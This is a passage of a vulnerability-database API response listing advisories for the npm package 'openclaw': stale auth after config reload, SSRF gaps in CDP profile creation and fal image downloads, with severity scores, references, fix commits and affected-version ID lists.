"VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31" } ], "aliases": [ "CVE-2026-41336", "GHSA-3qpv-xf3v-mm45" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-vx5d-3d98-7kf3" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89488?format=api", "vulnerability_id": "VCID-vy8v-np82-r3b5", "summary": "OpenClaw: resolvedAuth closure becomes stale after config reload\n## Impact\n\nresolvedAuth closure becomes stale after config reload.\n\nAfter a config reload, newly accepted gateway connections could continue using stale resolved auth state.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @kexinoh of Tencent zhuque Lab (https://github.com/Tencent/AI-Infra-Guard) for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41916", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00088", "scoring_system": "epss", "scoring_elements": "0.2519", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00088", "scoring_system": "epss", "scoring_elements": "0.25127", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00088", "scoring_system": "epss", "scoring_elements": "0.25176", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41916" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-68x5-xx89-w9mm", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T19:00:46Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-68x5-xx89-w9mm" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41916", "reference_id": "CVE-2026-41916", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41916" }, { "reference_url": "https://github.com/advisories/GHSA-68x5-xx89-w9mm", "reference_id": "GHSA-68x5-xx89-w9mm", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-68x5-xx89-w9mm" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-stale-authentication-state-via-config-reload", "reference_id": "openclaw-stale-authentication-state-via-config-reload", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T19:00:46Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-stale-authentication-state-via-config-reload" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109872?format=api", "purl": "pkg:npm/openclaw@2026.4.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2g7x-vu14-nkde" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dqb2-dej7-augt" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-h9a4-1twb-d7d1" }, { "vulnerability": "VCID-hy24-6xpe-pkb7" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w2yd-uw91-9yck" }, { "vulnerability": "VCID-wyat-1259-2kg9" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8" } ], "aliases": [ "CVE-2026-41916", "GHSA-68x5-xx89-w9mm" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-vy8v-np82-r3b5" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89518?format=api", "vulnerability_id": "VCID-vz7k-r7c4-ebfg", "summary": "OpenClaw: Browser CDP profile creation skipped strict-mode SSRF checks\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `< 2026.4.20`\n- Patched version: `2026.4.20`\n\n## Impact\n\nBrowser profile creation normalized `cdpUrl` values before persisting them, but did not apply the configured browser SSRF policy at creation time. In deployments that explicitly disabled private-network CDP targets, a stored profile could still point at a private-network or metadata endpoint and later be probed by normal profile status flows.\n\nDefault trusted-operator browser behavior allows private-network CDP endpoints, so this only affected strict-mode deployments. Severity is low.\n\n## Fix\n\nOpenClaw now checks CDP endpoints against the browser SSRF policy during profile creation and reachability operations.\n\nFix commits:\n\n- `1fd049e3074cac72f6734a7fe88468c84f5f8bd7`\n- `e90c89cf8b1459f2aa1f3a665be67392b6c03fdf`\n\n## Release\n\nFixed in OpenClaw `2026.4.20`.", "references": [ { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/1fd049e3074cac72f6734a7fe88468c84f5f8bd7", "reference_id": "", "reference_type": "", "scores": [ { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/1fd049e3074cac72f6734a7fe88468c84f5f8bd7" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/e90c89cf8b1459f2aa1f3a665be67392b6c03fdf", "reference_id": "", "reference_type": "", "scores": [ { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/e90c89cf8b1459f2aa1f3a665be67392b6c03fdf" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-j4c5-89f5-f3pm", "reference_id": "", "reference_type": "", "scores": [ { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-j4c5-89f5-f3pm" }, { "reference_url": "https://github.com/advisories/GHSA-j4c5-89f5-f3pm", "reference_id": "GHSA-j4c5-89f5-f3pm", "reference_type": "", "scores": [ { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-j4c5-89f5-f3pm" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109923?format=api", "purl": "pkg:npm/openclaw@2026.4.20", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.20" } ], "aliases": [ "GHSA-j4c5-89f5-f3pm" ], "risk_score": 1.4, "exploitability": "0.5", "weighted_severity": "2.7", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-vz7k-r7c4-ebfg" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89125?format=api", "vulnerability_id": "VCID-w2rd-2j4p-gfgw", "summary": "OpenClaw affected by SSRF via unguarded image download in fal provider\n## Summary\n\nThe fal provider used raw fetches for both provider API traffic and returned image download URLs instead of the existing SSRF-guarded fetch path.\n\n## Impact\n\nA malicious or compromised fal relay could make the gateway fetch internal URLs and expose metadata or internal service responses through the image pipeline.\n\n## Affected Component\n\n`extensions/fal/image-generation-provider.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `80d1e8a11a` (`fal: guard image fetches`).\n\nOpenClaw thanks @AntAISecurityLab for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34504", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00054", "scoring_system": "epss", "scoring_elements": "0.17232", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00054", "scoring_system": "epss", "scoring_elements": "0.17236", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00056", "scoring_system": "epss", "scoring_elements": "0.17891", "published_at": "2026-06-07T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34504" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:L/SI:L/SA:L" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/80d1e8a11a2ac118c7f7a70bba9c862b6141d928", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:L/SI:L/SA:L" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:21:09Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/80d1e8a11a2ac118c7f7a70bba9c862b6141d928" }, { "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.28", "reference_id": "", "reference_type": "", "scores": [ { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:L/SI:L/SA:L" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.28" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-qxgf-hmcj-3xw3", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L" }, { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:L/SI:L/SA:L" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:21:09Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-qxgf-hmcj-3xw3" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34504", "reference_id": "", "reference_type": "", "scores": [ { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:L/SI:L/SA:L" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34504" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-unguarded-image-download-in-fal-provider", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:L/SI:L/SA:L" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:21:09Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-unguarded-image-download-in-fal-provider" }, { "reference_url": "https://github.com/advisories/GHSA-qxgf-hmcj-3xw3", "reference_id": "GHSA-qxgf-hmcj-3xw3", "reference_type": "", "scores": [ { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-qxgf-hmcj-3xw3" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api", "purl": "pkg:npm/openclaw@2026.3.28", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": 